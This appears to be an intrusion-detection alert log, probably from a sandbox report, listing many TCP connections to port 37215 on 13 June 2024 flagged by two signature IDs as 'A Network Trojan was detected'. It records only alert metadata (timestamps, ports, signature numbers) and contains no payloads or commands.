              Timestamp:06/13/24-21:32:30.125181
              SID:2829579
              Source Port:38246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042099
              SID:2829579
              Source Port:46386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078503
              SID:2835222
              Source Port:49336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676219
              SID:2829579
              Source Port:42126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357748
              SID:2829579
              Source Port:44050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566467
              SID:2829579
              Source Port:59586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041382
              SID:2835222
              Source Port:42924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254431
              SID:2835222
              Source Port:40184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356749
              SID:2829579
              Source Port:53226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885983
              SID:2835222
              Source Port:33612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088106
              SID:2829579
              Source Port:33410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253484
              SID:2829579
              Source Port:56518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252684
              SID:2829579
              Source Port:41834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949848
              SID:2835222
              Source Port:44466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130859
              SID:2835222
              Source Port:52674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487323
              SID:2829579
              Source Port:59076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568640
              SID:2829579
              Source Port:55840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097149
              SID:2835222
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059964
              SID:2829579
              Source Port:54518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177275
              SID:2835222
              Source Port:58346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678730
              SID:2829579
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658382
              SID:2829579
              Source Port:55932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708052
              SID:2829579
              Source Port:45978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724509
              SID:2829579
              Source Port:38772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508073
              SID:2835222
              Source Port:38150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073457
              SID:2835222
              Source Port:58342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177374
              SID:2835222
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246747
              SID:2835222
              Source Port:33732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356001
              SID:2829579
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197474
              SID:2829579
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525452
              SID:2835222
              Source Port:57628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566822
              SID:2835222
              Source Port:41096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309676
              SID:2829579
              Source Port:40756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671676
              SID:2829579
              Source Port:51906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697263
              SID:2829579
              Source Port:35868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439336
              SID:2835222
              Source Port:49316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355202
              SID:2829579
              Source Port:50232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976078
              SID:2829579
              Source Port:49212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609703
              SID:2835222
              Source Port:50152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153353
              SID:2829579
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506417
              SID:2829579
              Source Port:48158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420847
              SID:2835222
              Source Port:41360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358509
              SID:2829579
              Source Port:35772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608639
              SID:2829579
              Source Port:53456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347284
              SID:2835222
              Source Port:42304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953920
              SID:2829579
              Source Port:45902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243960
              SID:2835222
              Source Port:46926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353596
              SID:2829579
              Source Port:41720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835282
              SID:2829579
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527617
              SID:2829579
              Source Port:50334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545985
              SID:2835222
              Source Port:58768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320941
              SID:2835222
              Source Port:58086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570188
              SID:2835222
              Source Port:51508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085159
              SID:2835222
              Source Port:52194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176825
              SID:2829579
              Source Port:60838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278363
              SID:2835222
              Source Port:55780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824041
              SID:2829579
              Source Port:51202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157314
              SID:2829579
              Source Port:33702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458062
              SID:2835222
              Source Port:38700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617374
              SID:2835222
              Source Port:41862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953780
              SID:2829579
              Source Port:44000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408281
              SID:2835222
              Source Port:38040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356655
              SID:2829579
              Source Port:38966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308669
              SID:2835222
              Source Port:48004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997026
              SID:2835222
              Source Port:48728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711479
              SID:2835222
              Source Port:37286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310142
              SID:2835222
              Source Port:46396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297133
              SID:2835222
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756907
              SID:2829579
              Source Port:46812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554450
              SID:2835222
              Source Port:41216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552406
              SID:2829579
              Source Port:55598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275555
              SID:2829579
              Source Port:39542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487381
              SID:2829579
              Source Port:36200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300862
              SID:2835222
              Source Port:48506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477174
              SID:2835222
              Source Port:40874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299320
              SID:2835222
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566731
              SID:2829579
              Source Port:33158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790705
              SID:2829579
              Source Port:53456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231374
              SID:2835222
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303747
              SID:2829579
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173724
              SID:2835222
              Source Port:44302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012882
              SID:2835222
              Source Port:42464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555256
              SID:2829579
              Source Port:59104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635770
              SID:2835222
              Source Port:59536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869670
              SID:2835222
              Source Port:39756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544981
              SID:2835222
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567591
              SID:2835222
              Source Port:41044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419039
              SID:2835222
              Source Port:41312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913005
              SID:2829579
              Source Port:51270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042356
              SID:2829579
              Source Port:49356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940354
              SID:2829579
              Source Port:49852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678591
              SID:2829579
              Source Port:54552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278401
              SID:2829579
              Source Port:40000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418018
              SID:2835222
              Source Port:43814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669156
              SID:2835222
              Source Port:40102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374801
              SID:2835222
              Source Port:38542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276438
              SID:2835222
              Source Port:54346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670711
              SID:2835222
              Source Port:54114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726910
              SID:2829579
              Source Port:50634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027233
              SID:2835222
              Source Port:56590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438887
              SID:2829579
              Source Port:33606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276017
              SID:2829579
              Source Port:56022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265163
              SID:2835222
              Source Port:44098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131976
              SID:2835222
              Source Port:36076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012689
              SID:2829579
              Source Port:47688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484738
              SID:2829579
              Source Port:57330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174908
              SID:2829579
              Source Port:58130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246902
              SID:2829579
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243913
              SID:2829579
              Source Port:43298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528153
              SID:2835222
              Source Port:46898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210230
              SID:2835222
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194871
              SID:2829579
              Source Port:49040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309543
              SID:2829579
              Source Port:38558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078150
              SID:2835222
              Source Port:39214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212901
              SID:2835222
              Source Port:58176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.061042
              SID:2829579
              Source Port:48298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074942
              SID:2835222
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631090
              SID:2835222
              Source Port:56170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758360
              SID:2829579
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091518
              SID:2829579
              Source Port:49210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248651
              SID:2829579
              Source Port:58524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158159
              SID:2829579
              Source Port:45886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974717
              SID:2835222
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841649
              SID:2829579
              Source Port:59652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488574
              SID:2835222
              Source Port:58860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276190
              SID:2829579
              Source Port:39406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868587
              SID:2835222
              Source Port:37880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087792
              SID:2835222
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564455
              SID:2829579
              Source Port:54218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787264
              SID:2835222
              Source Port:56308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369067
              SID:2835222
              Source Port:57726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730743
              SID:2829579
              Source Port:32818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823235
              SID:2829579
              Source Port:41798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800293
              SID:2835222
              Source Port:50856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108814
              SID:2829579
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914690
              SID:2829579
              Source Port:43730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349450
              SID:2835222
              Source Port:40780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791647
              SID:2829579
              Source Port:56770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158739
              SID:2835222
              Source Port:51360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153899
              SID:2835222
              Source Port:33944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373346
              SID:2835222
              Source Port:54508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213192
              SID:2829579
              Source Port:36134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097254
              SID:2829579
              Source Port:50636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753443
              SID:2829579
              Source Port:48422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042707
              SID:2835222
              Source Port:60350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299440
              SID:2829579
              Source Port:45034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678387
              SID:2835222
              Source Port:36704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166466
              SID:2829579
              Source Port:59016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612356
              SID:2829579
              Source Port:51100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345365
              SID:2829579
              Source Port:36080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937479
              SID:2829579
              Source Port:60420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630984
              SID:2829579
              Source Port:38280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543362
              SID:2835222
              Source Port:33876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676337
              SID:2829579
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694439
              SID:2829579
              Source Port:55838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164767
              SID:2835222
              Source Port:53248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552522
              SID:2829579
              Source Port:52500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294685
              SID:2835222
              Source Port:38332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167053
              SID:2829579
              Source Port:39572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258888
              SID:2829579
              Source Port:47094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502670
              SID:2829579
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177214
              SID:2835222
              Source Port:34504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833349
              SID:2835222
              Source Port:48376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401153
              SID:2835222
              Source Port:43756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801115
              SID:2829579
              Source Port:33086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606172
              SID:2835222
              Source Port:55850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610561
              SID:2835222
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502934
              SID:2829579
              Source Port:37566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477478
              SID:2835222
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045317
              SID:2829579
              Source Port:38484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296345
              SID:2835222
              Source Port:52856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834308
              SID:2835222
              Source Port:55326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420213
              SID:2829579
              Source Port:58856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401959
              SID:2829579
              Source Port:49162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913519
              SID:2829579
              Source Port:34828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307849
              SID:2829579
              Source Port:46626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196534
              SID:2835222
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323735
              SID:2829579
              Source Port:42772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056271
              SID:2835222
              Source Port:55474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727789
              SID:2829579
              Source Port:46432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309770
              SID:2829579
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222148
              SID:2835222
              Source Port:43318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457905
              SID:2835222
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835979
              SID:2829579
              Source Port:54050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266025
              SID:2835222
              Source Port:41202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784644
              SID:2829579
              Source Port:35178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753391
              SID:2829579
              Source Port:37708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370670
              SID:2835222
              Source Port:33770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274733
              SID:2835222
              Source Port:34162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488807
              SID:2835222
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731542
              SID:2835222
              Source Port:34848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672354
              SID:2835222
              Source Port:40696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403630
              SID:2829579
              Source Port:42256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417413
              SID:2835222
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137533
              SID:2835222
              Source Port:42116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170852
              SID:2829579
              Source Port:37668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168575
              SID:2829579
              Source Port:51376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255343
